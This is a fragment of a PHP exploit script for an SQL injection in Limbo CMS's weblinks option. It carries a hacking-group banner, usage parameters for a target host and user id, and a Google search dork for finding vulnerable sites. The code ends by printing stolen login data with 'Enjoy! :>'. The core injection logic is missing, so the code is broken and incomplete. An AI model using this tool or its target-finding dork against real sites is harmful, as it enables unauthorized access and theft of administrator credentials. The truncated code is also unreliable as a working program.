|
|
=0D
[i] Limbo CMS (option=weblinks) sql injection exploit=0D
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}=0D
=0D
[*] Usage: ?host=[hostname]&path=[limbo_path]&id=[user_id]=0D
[*] Exemple: ?host=127.0.0.1&path=/limbo&id=1=0D
=0D
[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" =0D
/",$f)) && (preg_match("/login/",$f)) )=0D
{=0D
echo "$f";=0D
echo "[+] Enjoy! :>=0D
";=0D
$success = 1;=0D
}=0D
}=0D
fclose($fp);=0D
=0D
if (!$success)=0D
echo "
[-] exploit failed :<
";=0D
}=0D
?> =0D